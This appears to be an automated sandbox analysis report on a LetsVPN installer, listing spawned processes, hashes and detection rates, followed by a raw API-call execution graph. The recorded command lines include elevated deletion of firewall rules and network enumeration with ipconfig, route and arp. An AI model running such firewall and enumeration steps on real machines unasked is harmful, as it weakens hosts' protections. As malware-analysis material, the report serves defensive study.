Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets.exe
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:10:30:02
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:10:30:03
Start date:29/12/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall Delete rule name=lets.exe
Imagebase:0x1080000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:10:30:03
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsPRO.exe
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsPRO
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsVPN
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                  Start time:10:30:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
                                                                                                                                                                                                  Imagebase:0x850000
                                                                                                                                                                                                  File size:247'840 bytes
                                                                                                                                                                                                  MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                  Start time:10:30:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                  Start time:10:30:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x850000
                                                                                                                                                                                                  File size:247'840 bytes
                                                                                                                                                                                                  MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                  Start time:10:30:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x730000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                  Start time:10:30:18
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Imagebase:0x7ff667590000
                                                                                                                                                                                                  File size:209'920 bytes
                                                                                                                                                                                                  MD5 hash:9A48D32D7DBA794A40BF030DA500603B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                  Start time:10:30:18
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                  Start time:10:30:18
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C ipconfig /all
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xb40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C route print
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                  Imagebase:0xf80000
                                                                                                                                                                                                  File size:19'456 bytes
                                                                                                                                                                                                  MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                  Start time:10:30:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C arp -a
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                  Start time:10:30:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                  Start time:10:30:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ARP.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:arp -a
                                                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                                                  MD5 hash:4D3943EDBC9C7E18DC3469A21B30B3CE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                  Start time:10:30:31
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                                                  Imagebase:0x200000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                  Start time:10:30:33
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" "/silent"
                                                                                                                                                                                                  Imagebase:0x4c0000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                  Start time:10:30:40
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                                                  Imagebase:0x500000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true


                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:7.1%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                    Signature Coverage:17.6%
                                                                                                                                                                                                    Total number of Nodes:1105
                                                                                                                                                                                                    Total number of Limit Nodes:21
calls 16331->16332 16333 18000e733 16332->16333 16334 18000e5ab 16333->16334 16335 18000e468 _Yarn 5 API calls 16333->16335 16336 18000e788 16334->16336 16335->16334 16337 18000e79a 16336->16337 16338 18000e5b6 16336->16338 16344 18000eab0 16337->16344 16340 18000e468 16338->16340 16341 18000e485 16340->16341 16343 18000e48f _fwrite_nolock 16340->16343 16342 180011058 free 5 API calls 16341->16342 16341->16343 16342->16343 16343->16326 16345 18000eae7 16344->16345 16346 18000eac0 EncodePointer 16344->16346 16346->16338 16348 180001ef6 16347->16348 16349 1800044e9 16347->16349 16348->16318 16357 18001176c 16348->16357 16349->16348 16350 18000eb24 std::ios_base::_Init 8 API calls 16349->16350 16351 1800044fa 16350->16351 16352 18000454f 16351->16352 16363 18000234c 16351->16363 16352->16348 16385 180002a5c 16352->16385 16358 180011798 std::exception::exception 6 API calls 16357->16358 16359 180001f0d 16358->16359 16359->16322 16361 18000eb24 std::ios_base::_Init 8 API calls 16360->16361 16362 18000e54b 16361->16362 16362->16314 16364 180002371 std::_Lockit::_Lockit 16363->16364 16370 1800023dd 16364->16370 16400 180011798 16364->16400 16369 180011998 _CxxThrowException 2 API calls 16369->16370 16403 18000e68c 16370->16403 16614 18000e6f8 16385->16614 16388 180002a78 16390 180002a8b 16388->16390 16391 180011058 free 5 API calls 16388->16391 16389 180011058 free 5 API calls 16389->16388 16392 180002a9e 16390->16392 16393 180011058 free 5 API calls 16390->16393 16391->16390 16394 180002ab1 16392->16394 16395 180011058 free 5 API calls 16392->16395 16393->16392 16396 180002ac4 16394->16396 16397 180011058 free 5 API calls 16394->16397 16395->16394 16398 180002ad7 16396->16398 16399 180011058 free 5 API calls 16396->16399 16397->16396 16399->16398 16410 1800118a0 16400->16410 16423 180015264 16403->16423 16405 18000e6a5 16406 18000e468 _Yarn 5 API calls 16405->16406 16407 18000e6bf 16406->16407 16408 180015264 setlocale 22 API calls 16407->16408 16409 18000e6ce 
16407->16409 16408->16409 16411 1800023c0 16410->16411 16412 1800118a5 _NMSG_WRITE 16410->16412 16411->16369 16412->16411 16414 180018b90 16412->16414 16415 180018ba5 16414->16415 16416 180018b9b 16414->16416 16417 180015dc8 _errno 5 API calls 16415->16417 16416->16415 16421 180018bc1 16416->16421 16418 180018bad 16417->16418 16419 180016cfc _invalid_parameter_noinfo DecodePointer 16418->16419 16420 180018bb9 16419->16420 16420->16411 16421->16420 16422 180015dc8 _errno 5 API calls 16421->16422 16422->16418 16424 180015296 16423->16424 16438 180015306 _invoke_watson 16423->16438 16450 18001d8c0 16424->16450 16429 180011058 free 5 API calls 16430 180015346 16429->16430 16443 1800152cf _invoke_watson 16430->16443 16476 18001a35c 16430->16476 16431 180015060 _calloc_crt 5 API calls 16432 1800152c7 16431->16432 16435 18001d8c0 _Wcsftime 18 API calls 16432->16435 16432->16443 16437 1800152ee 16435->16437 16437->16438 16439 1800152fc 16437->16439 16453 18001c278 16438->16453 16440 180011058 free 5 API calls 16439->16440 16440->16443 16441 180015391 16442 18001dc10 _wcstombs_s_l 22 API calls 16441->16442 16441->16443 16444 1800153eb 16442->16444 16443->16405 16444->16443 16446 180011058 free 5 API calls 16444->16446 16448 18001543f 16444->16448 16445 180015471 16495 1800131e4 LeaveCriticalSection 16445->16495 16446->16448 16448->16445 16449 180011058 free 5 API calls 16448->16449 16449->16445 16496 18001d790 16450->16496 16454 18001c2b5 16453->16454 16455 18001c29e 16453->16455 16456 18001a35c _getptd 18 API calls 16454->16456 16457 180015dc8 _errno 5 API calls 16455->16457 16458 18001c2ba 16456->16458 16459 18001c2a3 16457->16459 16539 18001b814 16458->16539 16461 180016cfc _invalid_parameter_noinfo DecodePointer 16459->16461 16470 18001533b 16461->16470 16463 180015060 _calloc_crt 5 API calls 16464 18001c2dd _copytlocinfo_nolock 16463->16464 16464->16470 16551 1800131e4 LeaveCriticalSection 16464->16551 16470->16429 16477 18001a380 _getptd_noexit 5 API calls 
16476->16477 16479 18001a367 16477->16479 16478 180015350 16481 18001dc10 16478->16481 16479->16478 16480 180010c94 _amsg_exit 18 API calls 16479->16480 16480->16478 16484 18001dc39 16481->16484 16482 18001dc8f 16483 180015dc8 _errno 5 API calls 16482->16483 16494 18001dc94 16483->16494 16484->16482 16485 18001dc63 16484->16485 16564 18001d8e0 16485->16564 16487 180016cfc _invalid_parameter_noinfo DecodePointer 16490 18001dc86 16487->16490 16488 18001dc73 16489 18001dc79 16488->16489 16492 18001dca4 16488->16492 16491 180015dc8 _errno 5 API calls 16489->16491 16490->16441 16491->16490 16492->16490 16493 180015dc8 _errno 5 API calls 16492->16493 16493->16494 16494->16487 16497 18001d7c0 16496->16497 16498 18001d7e2 16497->16498 16499 18001d7c5 16497->16499 16517 18001230c 16498->16517 16500 180015dc8 _errno 5 API calls 16499->16500 16502 18001d7d1 16500->16502 16504 180016cfc _invalid_parameter_noinfo DecodePointer 16502->16504 16503 18001d800 16505 18001d824 16503->16505 16506 18001d818 16503->16506 16512 1800152af 16504->16512 16523 18001d5b4 16505->16523 16507 180015dc8 _errno 5 API calls 16506->16507 16509 18001d81d 16507->16509 16513 180016cfc _invalid_parameter_noinfo DecodePointer 16509->16513 16510 18001d834 16511 18001d83a 16510->16511 16515 18001d84c 16510->16515 16514 180015dc8 _errno 5 API calls 16511->16514 16512->16431 16512->16438 16513->16512 16514->16512 16515->16512 16516 180015dc8 _errno 5 API calls 16515->16516 16516->16509 16518 180012322 16517->16518 16521 18001235c 16517->16521 16519 18001a35c _getptd 18 API calls 16518->16519 16520 180012327 16519->16520 16520->16521 16522 18001b814 __pctype_func 18 API calls 16520->16522 16521->16503 16522->16521 16524 18001d5e5 16523->16524 16525 18001d613 16524->16525 16526 18001d5fa 16524->16526 16533 18001d5ea _NMSG_WRITE 16524->16533 16528 18001230c _LocaleUpdate::_LocaleUpdate 18 API calls 16525->16528 16527 180015dc8 _errno 5 API calls 16526->16527 16529 18001d5ff 16527->16529 16530 18001d620 
